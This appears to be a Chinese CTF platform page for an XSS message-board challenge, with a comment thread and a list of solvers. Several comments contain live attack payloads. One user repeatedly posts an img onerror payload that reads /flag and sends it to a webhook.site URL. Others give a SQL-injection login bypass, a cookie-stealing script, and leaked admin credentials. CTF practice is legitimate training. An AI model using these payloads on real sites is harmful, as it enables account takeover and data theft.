留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3524
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
兄弟不要颓废 9天前

https://www.yuque.com/xiongdibietuifeile/vr6h2q/flap13mdc8f9s0ce#smnAi 欢迎各位大佬批评指正

回复 0

厌弃. 1月前

好像登录才能触发xss

回复 0

小石 1月前

进入admin.php后,刷新不会弹出对话框,自己进去调试界面看一下cookie即可。

回复 0

Terrenc44 1月前

不用xss,dns外带一下,一样可以的

回复 0

追风的牛牛 2月前

笑死了,他把db那个数据库路径删除了

回复 0

song..22 4月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 0

song..22 4月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 1

song..22 4月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 0

Gcysnd 5月前

挺容易,挖到admin后台/admin.php用1' or '1' = '1' --万能用户名登录后发现存在html注入点,于是聊天室发送<script>alert(cookie)</scirpt>找到flag

回复 0
xxsko 4月前

万能用户名你可以?我用你这个也不行1' or '1' = '1' --万能用户名

回复 0

2333m 5月前

触发xss需要登录后台/admin.php, admin/011be4d65feac1a8 (通过翻评论区找到的,据说是dirsearch跑出来admin.php和db.sql,但是我没找到)

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(20)

解题动态

小白修炼日常 攻破了该题 9小时前
加州故事 攻破了该题 4天前
星宇Sec 攻破了该题 7天前
xyqt 攻破了该题 7天前
这个昵称已存在 攻破了该题 7天前
zzz122 攻破了该题 7天前
兄弟不要颓废 攻破了该题 9天前
赖皮蛇 攻破了该题 11天前
ItsAllOver 攻破了该题 12天前
1075220327 攻破了该题 12天前
vb嘎嘎 攻破了该题 13天前
suyifeim4 攻破了该题 14天前
风度空山 攻破了该题 16天前
CyberX 攻破了该题 16天前
mystery 攻破了该题 17天前
13030217972 攻破了该题 17天前
woshicaocao 攻破了该题 21天前
小白d 攻破了该题 23天前
mybugku26 攻破了该题 23天前
willow 攻破了该题 25天前
问题反馈